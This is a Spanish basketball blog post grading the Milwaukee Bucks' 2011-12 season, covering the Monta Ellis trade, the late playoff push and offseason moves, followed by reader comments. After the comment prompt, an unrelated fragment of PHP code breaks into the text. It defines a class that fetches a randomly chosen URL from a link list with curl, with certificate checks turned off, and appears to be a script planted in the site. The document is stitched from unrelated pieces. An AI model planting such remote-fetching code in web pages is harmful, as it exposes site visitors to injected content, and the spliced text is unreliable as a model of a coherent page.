Milwaukee Bucks: Aprobado

09 de July de 2012 por Sancho88
Hoy toca calificar a uno de los equipos más atractivos y valientes de esta temporada: los Milwaukee Bucks. El equipo del estado de Wisconsin nos ha dado mucho juego en los últimos dos meses de liga y ha conseguido animar una Conferencia Este más previsible que nunca, o al menos, previsible hasta que llegaron ellos en el tramo final de la competición. Los Bucks nos hicieron vibrar viendo como ascendían partido a partido, resucitaron al mejor Carmelo Anthony en los Knicks debido a la presión de quedarse fuera de ‘Playoffs’ y pusieron contra las cuerdas a los Sixers por la última plaza en el Este. El primero de los últimos se suele decir, pero en este caso, Milwaukee fue el último de los primeros; plaza honorífica y espiritual -aunque no presencial- en postemporada que se ganaron por pleno derecho.

Brandon Jennings y compañía terminaron finalmente terceros de la División Central (31-35) con un más que aceptable 47% de victorias y, como vaticinó Txus en el análisis previo, dieron guerra hasta el final en la lucha por las eliminatorias. Pero no siempre fue así en los cuatro meses de competición. Hubo varios tramos de temporada bastante diferenciados y, quizá, fue la falta de regularidad la que les privó de lograr objetivos mayores.

Comenzaron encadenando 6 derrotas en 8 partidos. No encontraban un quinteto tipo y los focos giraban en torno a ‘figuras’ como el ‘sophomore’ Larry Sanders, o los ‘rookies’ Jon Leuer y Tobías Harris. Ninguno de ellos fue el alero protagonista del equipo y el banquillo apenas aportaba nada con hombres como Udrih o Livingston en el juego exterior. Algo más aportaba Mbah a Moute en la pintura. Curiosamente y también desde el banquillo, Dunleavy se erigió como factor de confianza para cubrir la posición más huérfana de todo el roster de los ‘Ciervos’ durante muchos momentos de la temporada: la del forward (si consideramos a Ilyasova power forward). Le viene de maravilla el rol de 6º hombre en estos Bucks al alero de Oregon.

Siguió avanzando la competición y hasta el fin de semana de las estrellas firmaron un 17-24 nada alentador. Entremedias, Andrew Bogut se fracturó el tobillo izquierdo y ‘Capitán Jack’ se afilió a la DNP-Coach decision como forma de vida. A pesar del buen nivel de Jennings, quien jugó su mejor baloncesto desde que llegó a la liga (19-3-6), y a pesar del 13-9 de Ilyasova, del 14-7 de Gooden y del renacer baloncestístico del propio Mike Dunleavy (12 puntos, casi 4 rebotes y 2 asistencias saliendo desde el banquillo y con porcentajes de escándalo), el equipo no acababa de encadenar buenos resultados. Pero todo eso cambiaría después del All-Star. Como en la Fórmula 1, algunos equipos apuestan por probar el coche de cara a la próxima temporada pero Milwaukee decidió metafóricamente seguir introduciendo mejoras en el bólido. Después del movidito fin de semana de las estrellas (sobre todo para Kings y Hornets) en los despachos de los Bucks tenían varias sorpresas preparadas, y estas no tardarían demasiado en llegar.

La segunda parte del buen curso de los Bucks transcurrió entre el 9 de marzo y el 7 de abril. Fue un mes excelente en el que llegaron a encadenar 6 victorias consecutivas y firmaron un impecable parcial de 13-4, promediando 105 puntos cada noche. El 14 de marzo se producía el cambio importante, la apuesta valiente del equipo por avanzar más allá de los límites de la Regular. Quizá fue demasiado tarde. Monta Ellis llegó al equipo en un traspaso múltiple con los Warriors junto a Ekpe Udoh  y el expiring de Kwame Brown a cambio del lesionado de larga duración Andrew Bogut y del defenestrado Stephen Jackson. Los Bucks querían realmente entrar en la pomada, jugar por algo más grande, y desde el principio Ellis aportó grandes cosas para su equipo, participando en ese gran parcial del mes de marzo. Los Bucks alcanzaron el 50% de victorias/derrotas (28-28) por primera vez en la temporada y pelearon por el octavo puesto a un juego escaso de distancia con Knicks y Sixers. No obstante, la racha se rompió contra Oklahoma el 7 de abril y a partir de ahí perdieron todas sus opciones de entrar en los ‘Playoffs’. Firmaron un parcial horrible (3-7) en los últimos 10 partidos de liga, precisamente cuando se estaban jugando las habichuelas y el honor de haber completado una temporada inmejorable con el premio de las eliminatorias por el título. Por eso la nota se queda en un aprobado. Pudo ser mucho más alta, un notable alto quizá. Una lástima, pues hicieron saltar todas las alarmas en Nueva York y Philadelphia cuando nadie lo esperaba.

Finalmente fueron 9º de la Conferencia Este, un puesto menor objetivamente, que podrçian haber mejorarado de haber aguantado el ritmo de victorias en los últimos 10 juegos ya que tenían duelos directos precisamente contra Knicks y Sixers. El primero lo jugaban en casa, y a excepción de melo15 y vader, por aquí todos dimos por muertos a los de la ‘Gran Manzana’. No se equivocaron. Carmelo Anthony vio peligrar su propio trono como jugador franquicia de los Knicks y tiró de calidad suprema, como en todo el mes de abril. Con 36 puntos y 10 rebotes fue el líder de los Knicks aquella noche. Los Bucks se habían quedado sin opciones. Indiana y unos revividos Wizards dieron la puntilla pocos días después. Philadelphia se unió a la fiesta en el penúltimo juego. El bastión del Bradley Center era la fortaleza aparente de este equipo pero en el último mes no les valió para nada. Drew Gooden y Ersan Ilyasova no estuvieron a la altura de una pareja interior de garantías durante esos días. Por no hablar de Delfino como complemento a Ellis en el juego exterior. Los tres se diluyeron como azucarillos y dejaron toda la responsabilidad a la dupla Jennings-Ellis. De ellos se dijo que eran incompatibles, que no podían jugar juntos con una sola pelota, pero ambos se encargaron de destrozar el mito y fueron los únicos que intentaron la gran gesta hasta el final. Sería injustísimo no nombrar también en este reducido grupúsculo a Dunleavy, incansable durante todo el año.

De todas formas, fue admirable la lucha y tenacidad de los Bucks en general. Mientras el resto de equipos no clasificados para Playoffs en el Este habían tirado por la borda la temporada incluso antes de llegar el All-Star Weekend, los Bucks hicieron todo lo contrario y se pusieron las botas de trabajo. Excelente el concepto de equipo de estos tipos, con Scott Skiles imponiendo su sello distintivo en la defensa e imprimiendo carácter, constancia, juego en equipo y un aire de seriedad que les convirtió en un rival difícil para cualquier equipo.

Si se piensa fríamente, ellos podrían haber sido los Sixers en segunda ronda poniendo en muchos problemas a los Celtics, pero el sueño se les quedó muy corto. Aún así, mantuvieron su honor impoluto y eso les honra. La temporada de los Bucks podría resumirse en una sola palabra: ¡Rescepto!, que diría el bueno de Baron Cohen en Ali-G.

Lo mejor: Lo Intentaron todo para llegar a los ‘Playoffs’. Skiles exprimió a sus jugadores al máximo y, a pesar de su mala fama de ‘amarrategui’, consiguió hacer jugar a su equipo de manera alegre, rozando los 100 puntos por partido. Fueron el 5º equipo de toda la NBA en el ranking ofensivo por anotación, y esto dice grandes cosas de los nuevos esfuerzos por reinventarse. Además, consiguieron mantener el ‘basket average’ positivo. El traspaso de Monta Ellis les honra, pues en vez de tirar la temporada a la basura intentaron hacerse un hueco entre los mejores. También han escogido bien en la noche del ‘draft’. Se han hecho con John Henson en el puesto 14, un potencial Top 10 en algunos ‘mocks’ previos, y en segunda ronda han elegido a Doron Lamb, el cañonero de los Wildcats durante todo el ‘March Maddness’. Llega al equipo con corona universitaria. Veremos si imprime el gen ganador al equipo. La nueva temporada dirá si son ‘robos’ del ‘draft’ o su baja posición estaba justificada. De momento, vienen enseñados de casita como le gusta a Skiles: son jugadores serios y con los conceptos defensivos bien aprendidos. Lo tendrán fácil de esa manera.

Lo peor: Sin duda, que a pesar de los grandes esfuerzos por dar la sorpresa y entrar en los ‘Playoffs’, no les dio la pólvora para tanto, y acabaron derrotados en los últimos partidos por equipos superiores como Knicks, Pacers y Sixers. Les correspondía dar guerra, pero hasta ahí. No obstante, por algo se empieza. Llevan más de 12 años sin pasar de primera ronda y no se pueden esperar milagros a estas alturas. Este año lo podrían haber conseguido seguramente si hubieran sido octavos, ya que la eliminatoria contra los Bulls aguardaba una particular sorpresa: la lesión de Derrick Rose, pero se quedaron a las puertas porque era imposible en las canchas exprimir más a esta plantilla (aunque Skiles dijera lo contrario, que lo dijo).

“I’m disappointed – very disappointed. We didn’t get done what we were expected to get done, so if everybody in there is not very, very disappointed, then we’ve got big problems.”

Ya decimos. Por mucho que le pese al entrenador de los Bucks, lo peor sin duda es que estos chicos parecen haber agotado su potencial. Estas son sus cartas y mejores jugadas no parece que vayan a ligar. Potencial muy limitado para una plantilla que busca su líder en la pintura tras la marcha de Bogut.

Jugando al GM:

– Ilyasova y los Bucks están cerca de llegar a un acuerdo por 5 años y 45 millones de dólares. Hace unos días pocos apostábamos por que el jugador turco continuara en Milwaukee pero ahora toda parece indicar que renovará.

– Los días previos a la noche del draft se hicieron con Samuel Dalembert que llegó al equipo procedente de los Rockets junto a la elección nº 14 del próximo draft, una futura segunda ronda y dinero en efectivo. Los Bucks enviaron a Houston Rockets a Jon Brockman, Jon Leuer, Shaun Livingston y su elección nº 12. Se quitan de esta manera contratos innecesarios, aunque baratos (a pesar de que Leuer podía tener cierta progresión) y refuerzan el puesto huérfano de center.

– Con la adquisición de Dalembert, las cosas parecen hechas en la zona. Henson, Gooden y Moute de 4’s y Dalembert y Udoh de 5’s. Mucho músculo y mucha defensa pero no excesivo talento en la canasta rival. Veremos cómo sale el experimento, pero a priori había opciones más jugosas que suplir a Bogut con Dalembert. No obstante, la pesca era fácil. En el despacho de los Rockets solo hace falta llevar una caña y llamar a la puerta. Algunos acuden incluso con redes de marinero. Algo pescas fijo. Quizá, muchos se plantean traspasar a Gooden (no es fácil) y darle la batuta a Henson. Sería un acierto. Los Bucks también han dejado la puerta abierta para volver a firmar a Kwame Brown, aunque personalmente lo considero un error.

– La posición más débil del equipo con diferencia es la de alero. Delfino fue la decepción clara esta temporada, aunque tampoco sorprende en él viendo su dinámica en los últimos años, y Dunleavy no es suficiente para asaltar los ‘Playoffs’, así como tampoco lo son Larry Sanders y Tobias Harris. Mbah-a-Moute podría salir de titular pero sus nulas cualidad ofensivas limitan el número de minutos que el camerunés puede estar en cancha. Se podría intentar pescar algo en los agentes libres, amnistiados, etc. Nombres como Jamison, Lewis, Hill o Artest no faltan en ninguna agenda, y obviamente la de los Bucks no iba a ser menos.

-El ‘backourt’ también está relativamente completo tras la elección de Doron Lamb. Puede ser un buen recambio para Ellis en la posición de ‘2’, donde puede jugar también Dunleavy. En la dirección Jennings es el jefe y luego está el tesoro salarial de Udrih. Toca comerse su último año de contrato, aunque el movimiento que hicieron con los Kings fue incluso bueno, ya que a ellos les toca comerse al menos otros dos años malos de los de Udrih con John Salmons. Petrie, te va por la escuadra cari…

-Así, plantear amnistías no tendría sentido en este equipo. Nadie va a querer a Udrih y lo único que se puede hacer es ofrecerle la renovación por el mínimo a Dunleavy para especular en algún futuro traspaso, y no ejercer la ‘team option’ sobre Sanders y Harris para la siguiente temporada. Sí hacerlo sin embargo en el caso de Udoh, un jugador muy aprovechable que no es barato precisamente, pero la calidad defensiva se paga en la NBA. Poco más se puede hacer en los Bucks. Si no eclosiona Henson en ataque, seguirán siendo limitadísimos. Pelearán otro año más por Playoffs, eso sí.

Comenta

8 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    Me parecen un equipo interesante y que como dices, luchará por playoffs. Aunque tengo más ganas de ver si Ilyasova es del “club del cazo mix” o se toma en serio su contratazo.

      Citar

  2. simon dice:
    #2

    HeiNeKeN:
    Me parecen un equipo interesante y que como dices, luchará por playoffs. Aunque tengo más ganas de ver si Ilyasova es del “club del cazo mix” o se toma en serio su contratazo.

    Me pasa exactamente igual que a ti.

      Citar

  3. COACH dice:
    #3

    No pensais que el contrato de Ilyasova esta totalmente fuera de mercado para en jugador de su perfil?. Creo que 5 años por 30 hubiese bastado,(como mucho 35) y nadie hubiese osado a igualarlo. Y con esos 10-15 millones más lo de Dalembert podrían fichar un 5 un poquito mejor.

      Citar

  4. nba dice:
    #4

    Yo no se para que tanto lockout, si luego los propietarios son los que se pegan tiros en el pie.

      Citar

  5. Esteban dice:
    #5

    despues lo leo sancho, no es personal, pero era necesario un analisi tan largo para un equipo tan intrascendente?

      Citar

  6. Sancho88 dice:
    #6

    A mí me encantan los análisis largos, jeje, pero sí, puede ser bastante tocho y pesado de leer, no niego que no… creo que el miércoles saldrá el de los Rockets, que también lo hago yo. Ese creo que estará bastante más entretenido, jeej. Bueno, creo no, aseguro

      Citar

  7. Esteban dice:
    #7

    ejejje igualmente aun no lo lei, no dije que sea pesado de leer, si me da algo de pereza, pero debe ser por q no me generan mayor interes los bucks

      Citar

  8. Sancho88 dice:
    #8

    me molaba más cuando me dabas caña macho, ya ni me lees los artículos… snif snif. que nadie me hable, no hay consuelo en esta noche de verano. creo que decididamente dormiré en el cementerio esta noche

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>